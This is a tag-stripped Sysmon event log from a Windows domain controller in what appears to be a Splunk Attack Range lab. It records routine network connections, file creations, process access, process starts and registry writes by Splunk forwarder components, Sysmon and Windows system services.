SERVICEtcpfalsetruefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local60623-truefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local135epmap 354300x80000000000000002202313Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:11.483{5ABCFE62-843F-603E-2900-00000000AD01}1292C:\Windows\System32\dfsrs.exeNT AUTHORITY\SYSTEMtcptruetruefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local60623-truefe80:0:0:0:a557:100f:ecfc:67eawin-dc-228.attackrange.local135epmap 23542300x80000000000000002202312Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:15.380{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8B2414E13FDA176A43C3DBA0A19C339D,SHA256=9DE664B3FF30372ECC5E003D42787C0C3F6509CDEF69FAFB107F3D2CA3E8656F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202316Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:16.381{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A18CB5E36B369E1BEE5266497828714,SHA256=431BA82B1CD5B144CEC5050844FA77F2642AEB996691E55B3E5E735FA096274B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202315Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:16.131{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FFEB632A02C562F1F616F12A28DF4BCA,SHA256=9831625FD304DAA3593DFE3717B4B9D0AC3332873CB71DE5BEFC408CF0A2D74C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002202327Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:12.966{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local60624-false10.0.1.12-8000- 10341000x80000000000000002202326Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:17.537{5ABCFE62-E8A5-6040-214E-00000000AD01}58766868C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202325Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:17.412{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E8A5-6040-214E-00000000AD01}5876C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202324Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:17.412{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202323Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:17.412{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202322Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:17.412{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202321Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:17.412{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202320Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:17.412{5ABCFE62-842D-603E-0500-00000000AD01}416432C:\Windows\system32\csrss.exe{5ABCFE62-E8A5-6040-214E-00000000AD01}5876C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002202319Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:17.412{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E8A5-6040-214E-00000000AD01}5876C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002202318Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:17.413{5ABCFE62-E8A5-6040-214E-00000000AD01}5876C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002202317Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:17.381{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=857056DBBE60179535BD0D045A975716,SHA256=63C31449F412CFDCFE5EE11B65F4D618B04077F0A24E80B1E3F78A9EFEAA0642,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000002202349Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 14:03:18.690{5ABCFE62-843F-603E-2900-00000000AD01}1292C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Volumes\20FED10E-0000-0000-0000-100000000000\Volume Configuration File\\.\C:\System Volume Information\DFSR\Config\Volume_20FED10E-0000-0000-0000-100000000000.XML 10341000x80000000000000002202348Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:18.690{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E8A6-6040-234E-00000000AD01}3664C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 13241300x80000000000000002202347Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 14:03:18.690{5ABCFE62-843F-603E-2900-00000000AD01}1292C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\0992B788-1468-4F36-93BE-112B21933E91\Config SourceDWORD (0x00000001) 13241300x80000000000000002202346Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-SetValue2021-03-04 14:03:18.690{5ABCFE62-843F-603E-2900-00000000AD01}1292C:\Windows\system32\DFSRs.exeHKLM\System\CurrentControlSet\Services\DFSR\Parameters\Replication Groups\0992B788-1468-4F36-93BE-112B21933E91\Replica Set Configuration File\\?\C:\System Volume Information\DFSR\Config\Replica_0992B788-1468-4F36-93BE-112B21933E91.XML 10341000x80000000000000002202345Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:18.690{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202344Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:18.690{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202343Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:18.690{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202342Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:18.690{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202341Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:18.690{5ABCFE62-842D-603E-0500-00000000AD01}416532C:\Windows\system32\csrss.exe{5ABCFE62-E8A6-6040-234E-00000000AD01}3664C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002202340Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:18.690{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E8A6-6040-234E-00000000AD01}3664C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002202339Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:18.692{5ABCFE62-E8A6-6040-234E-00000000AD01}3664C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002202338Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:18.424{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F3EAC1C68A95957A81BFA29DECED8C40,SHA256=16A6F4C645B1513BEF69084323CD21C8823B1A777D29957AEAB8B23A5F51A3F7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002202337Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:18.393{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A3EB72C625266942485355FCA7AD2474,SHA256=1E9F81C34605E3E6BDA4E447D979AF9B65A29C014407BE5106111C9140E2DBDC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002202336Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:18.206{5ABCFE62-E8A6-6040-224E-00000000AD01}62726740C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202335Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:18.081{5ABCFE62-84A3-603E-A900-00000000AD01}49124704C:\Windows\system32\conhost.exe{5ABCFE62-E8A6-6040-224E-00000000AD01}6272C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202334Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:18.081{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202333Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:18.081{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202332Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 14:03:18.081{5ABCFE62-842F-603E-0C00-00000000AD01}8525700C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002202331Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 